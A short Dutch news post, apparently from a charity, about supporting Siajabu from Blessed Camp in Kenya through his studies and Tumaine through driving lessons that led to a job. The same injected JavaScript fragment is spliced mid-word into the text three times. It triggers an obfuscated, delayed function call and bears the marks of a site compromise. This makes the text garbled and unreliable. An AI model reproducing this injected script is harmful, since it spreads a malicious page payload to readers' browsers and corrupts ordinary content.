Goed nieuws over Siajabu en Tumaine

We weten het niet zeker maar de kans is groot dat Siajabu de eerste dorpeling uit Blessed Camp is dat kan en mag studeren. Het studiegeld in Nederlandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} is u wellicht bekend. De meeste studies rekenen ongeveer € 2000,— op jaarbasis aan collegegeld. In Kenia ligt dat bedrag op ongeveer de helft en ook Siajabu heeft te maken met huur omdat hij niet meer in Blessed Camp kan wonen. Tendo ondersteunt Siajabu want zonder onze steun zal hij zijn studie financieel niet kunnen volbrengen. De afgelopen twee maandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}en heeft hij stage gelopen bij een veerbootmaatschappij. Volgens onze contactpersoon Peter Ochiel van Action Ministry heeft Siajabu een mooie toekomst voor de boeg. Verder hebben wij ook Tumaine, een andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ere dorpeling ondersteund. Wij hebben o.a. zijn rijlessen betaald en dit heeft zich uitbetaald in een baan als manager bij een rijschool.

Siajabu